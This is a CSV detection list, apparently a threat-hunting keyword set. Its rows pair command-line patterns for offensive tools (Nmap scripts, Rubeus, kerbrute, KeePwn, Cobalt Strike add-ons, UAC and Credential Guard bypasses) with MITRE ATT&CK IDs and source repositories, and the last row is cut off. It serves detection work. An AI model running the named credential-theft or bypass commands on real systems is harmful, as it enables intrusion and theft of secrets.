broadcast-eigrp-discovery.nse*",".{0,1000}\sbroadcast\-eigrp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-hid-discoveryd.nse*",".{0,1000}\sbroadcast\-hid\-discoveryd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-igmp-discovery.nse*",".{0,1000}\sbroadcast\-igmp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-jenkins-discover.nse*",".{0,1000}\sbroadcast\-jenkins\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-listener.nse*",".{0,1000}\sbroadcast\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-ms-sql-discover.nse*",".{0,1000}\sbroadcast\-ms\-sql\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-netbios-master-browser.nse*",".{0,1000}\sbroadcast\-netbios\-master\-browser\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-networker-discover.nse*",".{0,1000}\sbroadcast\-networker\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-novell-locate.nse*",".{0,1000}\sbroadcast\-novell\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-ospf2-discover.nse*",".{0,1000}\sbroadcast\-ospf2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-pc-anywhere.nse*",".{0,1000}\sbroadcast\-pc\-anywhere\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-pc-duo.nse*",".{0,1000}\sbroadcast\-pc\-duo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-pim-discovery.nse*",".{0,1000}\sbroadcast\-pim\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-ping.nse*",".{0,1000}\sbroadcast\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-pppoe-discover.nse*",".{0,1000}\sbroadcast\-pppoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-rip-discover.nse*",".{0,1000}\sbroadcast\-rip\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-ripng-discover.nse*",".{0,1000}\sbroadcast\-ripng\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-sonicwall-discover.nse*",".{0,1000}\sbroadcast\-sonicwall\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-sybase-asa-discover.nse*",".{0,1000}\sbroadcast\-sybase\-asa\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-tellstick-discover.nse*",".{0,1000}\sbroadcast\-tellstick\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-upnp-info.nse*",".{0,1000}\sbroadcast\-upnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-versant-locate.nse*",".{0,1000}\sbroadcast\-versant\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-wake-on-lan.nse*",".{0,1000}\sbroadcast\-wake\-on\-lan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-wpad-discover.nse*",".{0,1000}\sbroadcast\-wpad\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-wsdd-discover.nse*",".{0,1000}\sbroadcast\-wsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-xdmcp-discover.nse*",".{0,1000}\sbroadcast\-xdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* bropper.py*",".{0,1000}\sbropper\.py.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "* brute * /password*",".{0,1000}\sbrute\s.{0,1000}\s\/password.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* --bruteforce *.kdbx*",".{0,1000}\s\-\-bruteforce\s.{0,1000}\.kdbx.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "* BruteForce(*",".{0,1000}\sBruteForce\(.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "* --brute-ratel*",".{0,1000}\s\-\-brute\-ratel.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "* Brutesploit*",".{0,1000}\sBrutesploit.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","0","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "* bruteuser *",".{0,1000}\sbruteuser\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "* bruteuser -d *",".{0,1000}\sbruteuser\s\-d\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "* build Dent.go*",".{0,1000}\sbuild\sDent\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","294","50","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "* -Build -NoAttackPaths*",".{0,1000}\s\-Build\s\-NoAttackPaths.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "* build_letmeout*",".{0,1000}\sbuild_letmeout.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","10","10","140","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "* by @citronneur (v*",".{0,1000}\sby\s\@citronneur\s\(v.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* by @JoelGMSec *",".{0,1000}\sby\s\@JoelGMSec\s.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "* by erwan2212@gmail.com*",".{0,1000}\sby\serwan2212\@gmail\.com.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* BypassCredGuard.exe*",".{0,1000}\sBypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "* BypassFramework.py*",".{0,1000}\sBypassFramework\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "* BypassUac*.bat*",".{0,1000}\sBypassUac.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* BypassUac*.dll*",".{0,1000}\sBypassUac.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* BypassUac*.exe*",".{0,1000}\sBypassUac.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* -c ""!mimikatz"" *",".{0,1000}\s\-c\s\""!mimikatz\""\s.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "* -c * --choose-mutators * -s 1*",".{0,1000}\s\-c\s.{0,1000}\s\-\-choose\-mutators\s.{0,1000}\s\-s\s1.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1504","175","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "* -c * -o payload.ser*",".{0,1000}\s\-c\s.{0,1000}\s\-o\spayload\.ser.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "* -c * -s * -o share_listing -m 150*",".{0,1000}\s\-c\s.{0,1000}\s\-s\s.{0,1000}\s\-o\sshare_listing\s\-m\s150.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "* -c * -s * --proxy * --proxyu * --proxyp * --reconnect *",".{0,1000}\s\-c\s.{0,1000}\s\-s\s.{0,1000}\s\-\-proxy\s.{0,1000}\s\-\-proxyu\s.{0,1000}\s\-\-proxyp\s.{0,1000}\s\-\-reconnect\s.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "* -c *ExploitClass.cs*System.dll*",".{0,1000}\s\-c\s.{0,1000}ExploitClass\.cs.{0,1000}System\.dll.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -c *OBFUSCATION=*.ps1*",".{0,1000}\s\-c\s.{0,1000}OBFUSCATION\=.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense 